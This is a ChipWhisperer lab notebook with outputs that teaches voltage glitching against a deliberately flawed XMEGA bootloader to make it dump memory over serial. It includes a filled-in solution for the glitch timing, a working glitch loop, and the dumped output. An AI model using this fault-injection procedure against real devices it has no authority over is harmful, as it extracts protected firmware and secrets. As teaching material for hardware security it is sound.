# Part 2, Topic 3: Voltage Glitching to Dump Memory (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous labs, we learned how voltage glitching can be used for a similar function as clock glitching. We also learned about how it has fewer limitations, but can be less reliable for certain target setups. It also changes a great deal based on the properties of the glitch circuit itself - even changing a wire can have a huge effect.*

*In this lab, we'll use what we learned in the last lab to again attack the vulnerable serial printing of the bootloader*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching
* Understanding how compiler optimizations can cause devices to behave in strange ways

## The Situation

You should already know the situation from your previous attempts at glitching this bootloader (as well as what the flaw is). No need to do big long searches for parameters to try glitching at the beginning of the loop, just use values that worked well for the previous tutorial.

Be careful that you don't accidentally put the spot we're trying to glitch outside of `glitch_spots` - if you used a repeat > 1, the actual spot being glitched might be at the end or in the middle of the repeat!

Like with the clock glitching version of this lab, we'll be using SimpleSerial V2 to speed up glitching

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
SS_VER='SS_VER_2_1'

CRYPTO_TARGET = 'TINYAES128C'
allowable_exceptions = None
VERSION = 'HARDWARE'


In [2]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../firmware/mcu/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE -j SS_VER=$2

SS_VER set to SS_VER_2_1


SS_VER set to SS_VER_2_1


avr-gcc (GCC) 5.4.0
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the

 source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A

 PARTICULAR PURPOSE.



...

+--------------------------------------------------------
+-----------------------------------------

---------------


+ Built for platform CW-Lite XMEGA with:
+ CRYPTO_TARGET = NONE


+ CRYPTO_OPTIONS = AES128C


+--------------------------------------------------------


In [3]:

#!/usr/bin/env python
# coding: utf-8

# In[ ]:


import chipwhisperer as cw

try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope(hw_location=(5, 4))

try:
    if SS_VER == "SS_VER_2_1":
        target_type = cw.targets.SimpleSerial2
    elif SS_VER == "SS_VER_2_0":
        raise OSError("SS_VER_2_0 is deprecated. Use SS_VER_2_1")
    else:
        target_type = cw.targets.SimpleSerial
except:
    SS_VER="SS_VER_1_1"
    target_type = cw.targets.SimpleSerial

try:
    target = cw.target(scope, target_type)
except:
    print("INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.")
    print("INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.")
    scope = cw.scope(hw_location=(5, 4))
    target = cw.target(scope, target_type)


print("INFO: Found ChipWhisperer😍")


# In[ ]:


if "STM" in PLATFORM or PLATFORM == "CWLITEARM" or PLATFORM == "CWNANO":
    prog = cw.programmers.STM32FProgrammer
elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
    prog = cw.programmers.XMEGAProgrammer
elif "neorv32" in PLATFORM.lower():
    prog = cw.programmers.NEORV32Programmer
elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
    prog = cw.programmers.SAM4SProgrammer
else:
    prog = None


# In[ ]:


import time
time.sleep(0.05)
scope.default_setup()

def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.1)
        scope.io.pdic = 'high_z' #XMEGA doesn't like pdic driven high
        time.sleep(0.1) #xmega needs more startup time
    elif "neorv32" in PLATFORM.lower():
        raise IOError("Default iCE40 neorv32 build does not have external reset - reprogram device to reset")
    elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
        scope.io.nrst = 'low'
        time.sleep(0.25)
        scope.io.nrst = 'high_z'
        time.sleep(0.25)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high_z'
        time.sleep(0.05)




INFO: Found ChipWhisperer😍


scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 10906799                  to 22023253                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 127999992                 to 30407489                 
scope.clock.adc_rate                     changed from 127999992.0               to 30407489.0               
scope.clock.clkgen_

In [4]:
fw_path = "../../../firmware/mcu/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [5]:
cw.program_target(scope, prog, fw_path)

XMEGA Programming flash...


XMEGA Reading flash...


Verified flash OK, 2539 bytes


In [6]:
def reboot_flush():            
    reset_target(scope)
    #Flush garbage too
    target.flush()
scope.clock.adc_src = "clkgen_x1"
reboot_flush()
scope.adc.samples = 24000

Again, we're going to use a higher frequency on non-Husky ChipWhisperers. We'll also use the trigger length to get our `ext_offset` range:

In [7]:
scope.clock.adc_src = "clkgen_x1"
def reboot_flush():            
    reset_target(scope)
    #Flush garbage too
    target.flush()
    
scope.clock.adc_src = "clkgen_x1"
reboot_flush()
scope.adc.samples = 24000

if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
elif (PLATFORM == "CWLITEARM") or ("F3" in PLATFORM):
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37

reboot_flush()
scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
        
trig_count = scope.adc.trig_count

print(trig_count)
cw.plot(scope.get_last_trace())

1636


:Curve   [x]   (y)

Like with the clock version of this lab, you'll want to inspect the power trace and glitch near the beginning and end of the loop.

In [8]:
glitch_spots = [i for i in range(1)]
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
glitch_spots = list(range(trig_count - 2000, trig_count, 1))
if SS_VER == "SS_VER_2_1":
    glitch_spots = list(range(0, trig_count, 1))
elif PLATFORM == "CW308_SAM4S":
    glitch_spots = list(range(trig_count - 2300, trig_count-1800, 1))
elif PLATFORM == "CWLITEXMEGA":
    glitch_spots = list(range(9500, 9650, 1))
# ###################
# END SOLUTION
# ###################

In [9]:
if scope._is_husky:
    scope.vglitch_setup('hp', default_setup=False)
else:
    scope.vglitch_setup('both', default_setup=False) # use both transistors

def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')

In [10]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset", "tries"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

FloatSlider(value=0.0, continuous_update=False, description='tries setting:', disabled=True, max=10.0, readout…

In [11]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_index="width", y_index="ext_offset")

:DynamicMap   []
   :Overlay
      .Points.I  :Points   [width,ext_offset]
      .Points.II :Points   [width,ext_offset]

In [12]:
if scope._is_husky:
    gc.set_range("width", 1850, 1901)
    gc.set_range("offset", 2000, 2300)
    gc.set_global_step([50])
else:
    gc.set_global_step(0.4)
    if PLATFORM == "CWLITEXMEGA":
        gc.set_range("width", 46, 49.8)
        gc.set_range("offset", -46, -49.8)
        scope.glitch.repeat = 11
    elif PLATFORM == "CW308_STM32F4":
        gc.set_range("width", 0.4, 10)
        gc.set_range("offset", 40, 49.8)
        scope.glitch.repeat = 5
    elif PLATFORM == "CWLITEARM":
        gc.set_range("width", 34, 36)
        gc.set_range("offset", -40, 10)
        scope.glitch.repeat = 7

gc.set_range("tries", 1, 1) # change this if you want to glitch each spot multiple times
gc.set_range("ext_offset", glitch_spots[0], glitch_spots[-1])
gc.set_step("ext_offset", glitch_spots[1] - glitch_spots[0])
gc.set_step("tries", 1)

In [13]:
#disable logging
cw.set_all_log_levels(cw.logging.CRITICAL)
scope.adc.timeout = 0.2

broken = False
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    if broken:
        break
    scope.glitch.ext_offset = glitch_setting[2]
    if scope.adc.state:
        #print("Timeout, trigger still high!")
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    target.flush()
    scope.arm()
    target.write("p516261276720736265747267206762206f686c207a76797821\n")
    ret = scope.capture()
    if ret:
        #print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    else:
        time.sleep(0.05)
        output = target.read(timeout=2)
        if "767" in output:
            print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(scope.glitch.ext_offset, scope.glitch.offset, scope.glitch.width))
            gc.add("success")
            broken = True 
            for __ in range(500):
                num_char = target.in_waiting()
                if num_char:
                    my_print(output)
                    output = target.read(timeout=50)
            time.sleep(1)
            break
        else:
            gc.add("normal")
                
#reenable logging
cw.set_all_log_levels(cw.logging.WARNING)

Glitched!
	Ext offset: 1610
	Offset: -49.609375
	Width: 46.484375
o0





6720736265747267206762206f686c207a767978210x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00Don'0x00 forge0x00 0x00o b0x00y milk!0x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00
0x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x

0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040x040xAD0xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x04

0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x040xAD0x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00

In [14]:
scope.dis()
target.dis()

In [15]:
assert broken == True